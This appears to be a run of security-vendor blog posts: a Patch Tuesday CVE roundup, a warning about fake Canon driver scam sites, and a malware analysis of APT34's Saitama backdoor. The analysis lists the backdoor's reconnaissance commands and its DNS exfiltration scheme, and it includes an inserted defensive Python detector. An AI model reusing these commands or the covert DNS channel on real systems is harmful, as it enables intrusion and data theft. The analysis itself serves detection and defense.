CVE-2022-22713: A denial of service (DoS) vulnerability in Windows Hyper-V. Successful exploitation of this vulnerability requires an attacker to win a race condition. A race condition occurs when two or more threads can access shared data and try to change it at the same time.

Hyper-V is a native hypervisor, which means it can create virtual machines on x86-64 systems running Windows. The vulnerability only affects Windows Server (version 20H2) and Windows 10 x64-based systems (versions 20H2, 21H1, 21H2).

Redshift driver

CVE-2022-29972: A vulnerability that affects the Amazon Redshift ODBC and JDBC drivers and Amazon Athena ODBC and JDBC drivers due to improper validation of authentication tokens which may allow for unintended program invocation.

Microsoft products Azure Synapse Pipelines and Azure Data Factory are affected by a vulnerability in the Magnitude Simba Amazon Redshift ODBC Driver. An ODBC driver uses the Open Database Connectivity (ODBC) interface by Microsoft that allows applications to access data in database management systems (DBMS) using SQL (Structured Query Language) as a standard for accessing the data.

The vulnerability was dubbed SynLapse by the researchers that discovered it. They believe the tenant separation in the Microsoft Azure Synapse service is insufficiently robust to protect secrets against other tenants.

Windows Network File System

Next is a Remote Code Execution (RCE) vulnerability affecting Windows Network File System (NFS) listed under CVE-2022-26937. This vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE). Microsoft considers it likely to be exploited and it is one of the highest-rated vulnerabilities of the month with a CVSS score of 9.8 out of 10.

Point-to-Point Tunneling Protocol

CVE-2022-21972: a Point-to-Point Tunneling Protocol Remote Code Execution vulnerability. An unauthenticated attacker could send a specially crafted connection request to a RAS server, which could lead to remote code execution (RCE) on the RAS server machine. A remote access server (RAS) is a type of server that provides a suite of services to remotely connected users over a network or the Internet.

CVE-2022-23270: another Point-to-Point Tunneling Protocol Remote Code Execution vulnerability. An unauthenticated attacker could send a specially crafted connection request to a RAS server, which could lead to remote code execution (RCE) on the RAS server machine.

Successful exploitation of these two vulnerabilities requires an attacker to win a race condition.

Other updates

Microsoft is not the only vendor to issue patches. Here are some others that may deserve your attention.

Stay safe, everyone!


Canon printer owners: Be careful of bogus driver download sites

Malwarebytes - Wed, 05/11/2022 - 08:43

Think of all the really common, very mundane things you search for of a tech nature. Drivers. Scanners. Printers. A broken photocopier. USB sticks not recognised. Activating a streaming service which refuses to play ball.

Some of the above have many issues already with bogus search engine results and tech support scams. Streaming and other internet based viewing options have their own support related perils to contend with.

Have you ever stopped to consider what’s lurking out there in relation to your humble printer?

Bogus Canon sites causing headaches

Gizmodo reports that numerous dodgy sites are riding on the coat-tails of the Canon printer brand, extracting cash however they can. Gizmodo discovered the sites after issuing a Freedom of Information request to the Federal Trade Commission (FTC) in relation to Canon-specific complaints.

The sites vary in terms of style or general setup, but all focus on having you download Canon drivers. However, when someone attempts to download the driver, the download fails and the site displays a message with a phone number you can call for assistance. We’re very quickly in the realm of tech support scams. Direct requests for money in exchange for supposed drivers, or remote access requests quickly follow.

According to Gizmodo, there are also “support packages” available to buy over the phone which (of course) fail to materialise. All tried and tested Windows-centric tech support scam tactics.

Site specifics

The sites are referred to as fairly sophisticated. In fairness, a few of those listed are already offline or not responding to requests, so they may have been shut down since the report went live.

What’s left are sites that look a bit like blogs and loop visitors round, with no download in sight. Others are a bit more professional looking, and ask you to download a driver first.

Another is very upfront about you phoning the listed number before apparently doing anything else. No matter which site you end up on, they’re all about the drivers.

A very testing download

We decided to check one of the few remaining sites and see how hard it leans into error messages after a driver search. Testing the site in the above screenshot, the download button leads to another website altogether. I decided to look for a Canon PIXMA:

The site looks as though it has my driver. Success! Except not really. I’m not saying the odds are stacked against you when using this site, but look at the destination URL in the bottom left hand corner when hovering over the download driver button:

Yes, that does say /error.html. Yes, we’re about to run into that most common of tech support scam pages:

Printer driver installation has been failed due to fatal error “C0000022” preventing product driver installation. Please contact Canon Customer Support For Assistance! Click on below button to connect live chat experts

Tracing a problem

The Gizmodo article contains numerous examples of this type of scam. I decided to check out the BBB scam tracker and see if I could observe the evolution of the Canon scam. It turns out that you actually can (to a degree).

I turned up 17 reports of Canon themed scams from the beginning of 2021 to the present day across Canada and the US. They’re tagged as a mixture of phishing, tech support, and fake invoices.

What’s interesting is that most of the oldest scams are all about Canon cameras. Some are bogus orders, or missed deliveries. At the start of March, we see our first Canon printer tale of woe and it’s our old friend the customer support conversation slide.

Scammers inserted themselves into a help session for a Canon printer and posed as certified Canon technicians. They took remote control of my computer, got personal information and credit card numbers and charged $199 unsuccessfully.

In September, there’s a blend of printer driver and fake infection tactics:

Global Assistance has a scam that leads you to their fake canon website. They make you believe that you have computer infections that prohibit you from connecting to your printer. You have to pay for their services and then they make you believe that you need protection for all of your devices that can connect to the internet. After I fell for this, I did my research and found out that they are a scam. I called them and they refused to refund my money, $362.16 tonight.

Pretty much everything after September is a Canon printer scam—from bogus tech support and remote mobile/desktop connections to people being signed up to cryptocurrency and references to ransomware.

How to avoid these support sites

Never download a driver from anywhere other than the official Canon site. As long as you’re on the official site, you can feel reassured you are very likely not being scammed.

The moment you’re asked to call somebody, or grant them remote access to your device, close the site you’re on and ensure you’re where you want to be. As we’ve seen, this somewhat unique offshoot of the tech support scam can end up being just as costly.


APT34 targets Jordan Government using new Saitama backdoor

Malwarebytes - Tue, 05/10/2022 - 20:49

On April 26th, we identified a suspicious email that targeted a government official from Jordan’s foreign ministry. The email contained a malicious Excel document that drops a new backdoor named Saitama. Following our investigation, we were able to attribute this attack to the known Iranian actor APT34.

Also known as OilRig/COBALT GYPSY/IRN2/HELIX KITTEN, APT34 is an Iranian threat group that has targeted Middle Eastern countries and victims worldwide since at least 2014. The group is known to focus on the financial, governmental, energy, chemical, and telecommunication sectors.

In this blog post, we describe the attack flow and share details about the Saitama backdoor.

Malicious email file

The malicious email was sent to the victim via a Microsoft Outlook account with the subject “Confirmation Receive Document” with an Excel file called “Confirmation Receive Document.xls”. The sender pretends to be a person from the Government of Jordan by using its coat of arms as a signature.

Figure 1: Malicious email Excel document

The Excel attachment contains a macro that performs malicious activities. The document has an image that tries to convince the victim to enable a macro.

Figure 2: Excel doc

After enabling the macro, the image is replaced with the Jordan government’s coat of arms:

Figure 3: Excel doc after enabling the macro

The macro is executed on WorkBook_Open(). Here are the main functionalities of this macro:

Figure 4: Macro

  • Hides the current sheet and shows the new sheet that contains the coat of arms image.
  • Calls the “eNotif” function, which is used to send a notification of each step of macro execution to its server using the DNS protocol. To send a notification it builds the server domain for that step from the following parts: “qw” + identification of the step (in this step “zbabz”) + random number + domain name. Then it uses the following WMI query to get the IP address of the request: "Select * From Win32_PingStatus Where Address = '" & p_sHostName & "'", which performs the DNS lookup of the created subdomain.
  • Creates a TaskService object and gets the task folder that contains the list of the current tasks.
  • Calls the eNotif function.
  • Checks if there is a mouse connected to the PC and, if that is the case, performs the following steps:
    • Creates the %APPDATA%/MicrosoftUpdate directory.
    • Creates “Update.exe”, “Update.exe.config” and “Microsoft.Exchange.WenServices.dll”.
    • Reads the content of UserForm1.label1, UserForm2.label1 and UserForm3.label1, which are in base64 format, decodes them and finally writes them into the files created in the previous step.
    • Calls the eNotif function after each write.
  • Checks the existence of the Update.exe file and, if for some reason it has not been written to disk, writes it using a technique that loads a .NET assembly directly using mscorlib and Assembly.Load by manually accessing the VTable of IUnknown. This technique was taken from GitHub (link). Even though this technique was not used in this macro, since the file was already written, the function name (“Test”) suggests that the threat actor is trying to implement it in future attacks.
  • Finally, it calls the eNotif function.

Figure 5: Load .Net assembly

  • Defines an XML schema for a scheduled task and registers it using the RegisterTask function. The name of the scheduled task is MicrosoftUpdate and it is used to make Update.exe persistent.

Figure 6: Task Schema

Saitama Backdoor – A finite state machine

The dropped payload is a small backdoor that is written in .Net. It has the following interesting pdb path: E:\Saitama\Saitama.Agent\obj\Release\Saitama.Agent.pdb.

Saitama backdoor abuses the DNS protocol for its command and control communications. This is stealthier than other communication methods, such as HTTP. Also, the actor cleverly uses techniques such as compression and long random sleep times. They employed these tricks to disguise malicious traffic in between legitimate traffic.

Figure 7: DNS communications

Another element that we found interesting about this backdoor is the way it is implemented. The whole flow of the program is defined explicitly as a finite-state machine, as shown in Figure 7. In short, the machine changes its state depending on the command sent to every state. Graphically, the program flow can be seen as follows:

Figure 8: Graphical view of the state machine

The states of the finite-state machine are:


It is the initial state of the machine. It just accepts the start command that puts the machine into the ALIVE state.

ALIVE

This state contacts the C&C server, expecting to receive a command from the attackers. The server names are generated by a PRNG that involves transformations like the Mersenne Twister. These transformations generate subdomains of the domains hard coded in the Config class (Figure 9).

Figure 9: Main domains are hardcoded

Figure 10 shows an example of the generated subdomain:

Figure 10: Connection attempt to a C&C server

This state has two possible next stages. If the performed DNS request fails, the next stage is SLEEP. Otherwise, the next stage is RECEIVE.

SLEEP

These states put the backdoor in sleep mode. The amount of time that the program will sleep is determined by the previous stage. It is clear that one of the main motivations of the actor is to be as stealthy as possible. For example, unsuccessful DNS requests put the backdoor in sleep mode for a time between 6 and 8 hours! There are different sleep times depending on the situation (values are expressed in milliseconds):

Figure 11: A different sleep time for every situation

There is also a “Second Sleep” state that puts the program in sleep mode for a different amount of time.

RECEIVE

This state is used to receive commands from the C&C servers. Commands are sent using the IP address field that is returned by the DNS requests. Further details about the communication protocol are provided later in this report. In a nutshell, every DNS request is capable of receiving 4 bytes. The backdoor concatenates responses, building buffers in that way. These buffers contain the commands that the backdoor will execute.

DO (DoTask)

This state executes the commands received from the server. The backdoor has capabilities like executing remote pre-established commands, custom commands or dropping files. The communication also supports compression. The following figure shows the list of possible commands that can be executed by the backdoor.

ID  Type  Command
1   PS    Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress
2   PS    Get-NetNeighbor -AddressFamily IPv4 | Select-Object "IPADDress"
3   CMD   whoami
4   PS    [System.Environment]::OSVersion.VersionString
5   CMD   net user
6   --    [NOT USED]
7   PS    Get-ChildItem -Path "C:\Program Files" | Select-Object Name
8   PS    Get-ChildItem -Path 'C:\Program Files (x86)' | Select-Object Name
9   PS    Get-ChildItem -Path 'C:' | Select-Object Name
10  CMD   hostname
11  PS    Get-NetTCPConnection | Where-Object {$_.State -eq "Established"} | Select-Object "LocalAddress", "LocalPort", "RemoteAddress", "RemotePort"
12  PS    $(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null
13  PS    nslookup ise-posture.mofagov.gover.local | findstr /i Address;nslookup | findstr /i Address
14  PS    $(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null
15  PS    $(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null
16  PS    $(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null
17  PS    $(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null
18  PS    $(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null
19  PS    $(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 | findstr /i ttl) -eq $null;$(ping -n 1 ise-posture.mofagov.gover.local | findstr /i ttl) -eq $null
20  PS    Get-NetIPConfiguration | Foreach IPv4DefaultGateway | Select-Object NextHop
21  PS    Get-DnsClientServerAddress -AddressFamily IPv4 | Select-Object SERVERAddresses
22  CMD   systeminfo | findstr /i \"Domain\"

Figure 12: List of predefined commands

It is pretty shocking to see that even when attackers have the possibility of sending any command, they choose to add that predefined list in the backdoor in Base64 format. As we can see, some of them are common reconnaissance snippets, but some of them are not that common. In fact, some of the commands contain internal IPs and also internal domain names (like ise-posture.mofagov.gover.local). That shows that this malware was clearly targeted and also indicates that the actor has some previous knowledge about the internal infrastructure of the victim.

SEND

The Send state is used to send the results generated by commands to the actor’s server. In this case, the name of the subdomain will contain the data. As domain names are used to exfiltrate unknown amounts of data, the attackers had to split this data into different buffers. Every buffer is then sent through a different DNS request. As can be seen in Figure 13, all the information required to reconstruct the original data is sent to the attackers. The size of the buffer is only sent in the first packet.
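The beacon naming used by the macro’s eNotif function and the Receive/Send states described above are all visible in DNS logs, which is where a defender can catch them. The Python script below is an added example, not Malwarebytes’ code or the backdoor’s: it parses a constructed query log (the log format, client addresses and the domain c2-example.invalid are assumed), flags clients that issue many distinct Base32-looking subdomains under one parent domain, picks out labels shaped like the macro’s “qw” + step + number beacons, and rebuilds the 4-bytes-per-answer command buffer from captured A records, treating the octets as raw command text (an assumption that ignores any framing and the compression the real protocol supports).

```python
import re
from collections import defaultdict

# Constructed sample log (not real traffic): "<time> <client> <query name> <A answer or ->".
# 10.1.2.3 plays an infected host; c2-example.invalid stands in for the actor's domain.
SAMPLE_LOG = """\
2022-04-26T09:00:01Z 10.1.2.3 qwzbabz4821.c2-example.invalid -
2022-04-26T09:00:05Z 10.1.2.3 qwabcde1093.c2-example.invalid -
2022-04-26T09:10:00Z 10.1.2.3 MFRGGZDFMNTW.c2-example.invalid 119.104.111.97
2022-04-26T09:10:02Z 10.1.2.3 NBSWY3DPEB3W.c2-example.invalid 109.105.0.0
2022-04-26T09:11:00Z 10.1.2.4 www.example.com 93.184.216.34
2022-04-26T09:12:05Z 10.1.2.3 GEZDGNBVGY3TQOJQ.c2-example.invalid -
2022-04-26T09:12:30Z 10.1.2.4 api.example.com 93.184.216.35
"""

# RFC 4648 Base32 alphabet, 8+ characters (assumed; the report only says "a similar Base32 encoding").
BASE32_LABEL = re.compile(r"^[A-Z2-7]{8,}$")
# "qw" + step identifier + random number, as the macro's eNotif function builds it.
BEACON_LABEL = re.compile(r"^qw([a-z]+?)(\d+)$")


def parse_log(text):
    """Split log lines into dicts: client, first DNS label, parent domain (last two labels), answer."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, name, answer = line.split()
        labels = name.split(".")
        records.append({"ts": ts, "client": client, "label": labels[0],
                        "parent": ".".join(labels[-2:]),
                        "answer": None if answer == "-" else answer})
    return records


def beacon_steps(records):
    """Return (client, step id) pairs for labels shaped like the macro's progress notifications."""
    steps = []
    for r in records:
        m = BEACON_LABEL.match(r["label"])
        if m:
            steps.append((r["client"], m.group(1)))
    return steps


def flag_clients(records, min_unique=3):
    """Flag clients sending >= min_unique distinct Base32-looking labels under one parent domain.
    Ordinary hosts rarely do this; a backdoor exfiltrating through subdomains does it constantly."""
    seen = defaultdict(lambda: defaultdict(set))
    for r in records:
        if BASE32_LABEL.match(r["label"].upper()):
            seen[r["client"]][r["parent"]].add(r["label"])
    return {client: {parent: sorted(labels)
                     for parent, labels in parents.items() if len(labels) >= min_unique}
            for client, parents in seen.items()
            if any(len(labels) >= min_unique for labels in parents.values())}


def reassemble_command(records, client, parent):
    """Rebuild the buffer delivered to a client: each A answer carries 4 bytes (its octets),
    concatenated in query order. Trailing zero padding is stripped (framing assumed away)."""
    buf = bytearray()
    for r in records:
        if r["client"] == client and r["parent"] == parent and r["answer"]:
            buf.extend(int(octet) for octet in r["answer"].split("."))
    return bytes(buf).rstrip(b"\x00")


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("beacon steps:", beacon_steps(recs))
    print("flagged clients:", flag_clients(recs))
    print("delivered buffer:", reassemble_command(recs, "10.1.2.3", "c2-example.invalid"))
```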

Figure 13: Send data to server

Attribution

There are several indicators that suggest that this campaign has been operated by APT34.

  • Maldoc similarity: The maldoc used in this campaign shares some similarities with maldocs used in previous campaigns of this actor. More specifically, similar to what was mentioned in Check Point’s report, this maldoc registers a scheduled task that launches the executable every X minutes; it also uses the same anti-sandboxing technique (checking whether a mouse is connected to the PC). Finally, we see a similar pattern of beaconing back to the attacker’s server to inform the attacker about the current stage of execution.
  • Victims similarity: The group is known to target the government of Jordan and this is the case in this campaign.
  • Payload similarity: DNS is the most common method used by APT34 for its C&C communications. The group is also known to use uncommon encodings such as Base32 and Base36 in its previous campaigns. The Saitama backdoor uses a similar Base32 encoding for sending data to the servers that is used by DNSpionage. Also, to build subdomains it uses Base32 encoding that is similar to what was reported by Mandiant.

Malwarebytes customers are protected from this attack via our Anti-Exploit layer.


Confirmation Receive Document.xls
Saitama backdoor:

